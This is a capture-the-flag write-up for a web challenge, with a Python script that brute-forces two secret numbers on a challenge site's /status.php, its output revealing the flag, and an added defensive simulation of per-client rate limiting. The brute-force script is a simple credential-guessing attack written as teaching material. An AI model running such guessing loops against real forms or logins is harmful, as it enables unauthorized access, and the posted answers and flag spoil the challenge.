Category
Web
Description
I want to see how many people are actually my friends and aren’t just pretending! Only my best friends get flags. You can check our friendship status at this website.
Solution
For this challenge we get a page with two inputs.

Sending invalid values returns the message "Sorry, you're clearly not my friend if you don't know my favorite and second favorite numbers!" on /status.php.
Checking the request, we find the parameters "number" and "number2".
Using the following script, we can brute-force the correct numbers.
#!/usr/bin/env python3
import sys

import requests

url = 'https://mhsctf-ettubrute.0xmmalik.repl.co/status.php'

# Try every pair from 1 to 100; the failure page always contains 'Sorry'.
for n1 in range(1, 101):
    for n2 in range(1, 101):
        r = requests.post(url, data={'number': n1, 'number2': n2})
        print('Testing n1:', n1, 'n2:', n2, r.text)
        if 'Sorry' not in r.text:
            # Any other response means both numbers were accepted.
            print(r.text)
            sys.exit(0)
Let it run for a while and eventually we find the correct numbers.
Testing n1: 77 n2: 97 Wow! You must really be my friend if you know my favorite and second favorite numbers! Here's a flag for you: flag{pur3_s7r3ngth}
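The search succeeds because the form accepts unlimited guesses over a space of only 100 x 100 = 10,000 pairs. The following is an added example, not part of the original write-up or the challenge's code: it replays the same nested loop against a hypothetical server-side handler with a per-client guess limit. The handler, the limit of 5 guesses per 60 seconds, the one-request-per-second pace and the client address are assumptions.

```python
from collections import defaultdict, deque

FAVORITES = (77, 97)  # answer pair reported in the write-up's output

class GuessThrottle:
    """Sliding-window limit on guesses per client (assumed: 5 per 60 s)."""
    def __init__(self, max_guesses=5, window=60):
        self.max_guesses, self.window = max_guesses, window
        self.history = defaultdict(deque)  # client -> accepted guess times

    def allow(self, client, now):
        q = self.history[client]
        while q and now - q[0] >= self.window:  # expire old guesses
            q.popleft()
        if len(q) >= self.max_guesses:
            return False
        q.append(now)
        return True

def handle_status(throttle, client, number, number2, now):
    """Hypothetical stand-in for /status.php: (http_status, correct)."""
    if not throttle.allow(client, now):
        return 429, False  # refused before the guess is evaluated
    return 200, (number, number2) == FAVORITES

def replay_bruteforce(throttle, client="203.0.113.7"):
    """Replay the nested 1..100 loop at one request per simulated second.
    Returns (seconds elapsed, requests refused with 429)."""
    now = rejected = 0
    for n1 in range(1, 101):
        for n2 in range(1, 101):
            while True:  # a refused pair is retried on the next tick
                status, ok = handle_status(throttle, client, n1, n2, now)
                now += 1
                if status == 200:
                    break
                rejected += 1
            if ok:
                return now, rejected
    return None, rejected

if __name__ == "__main__":
    print("no limit :", replay_bruteforce(GuessThrottle(max_guesses=10**6)))
    print("5 per 60s:", replay_bruteforce(GuessThrottle()))
```

At this pace the unthrottled search finishes in a little over two hours, while the throttled one takes more than a day and generates tens of thousands of 429 responses from a single client, which is an easy signal to alert on.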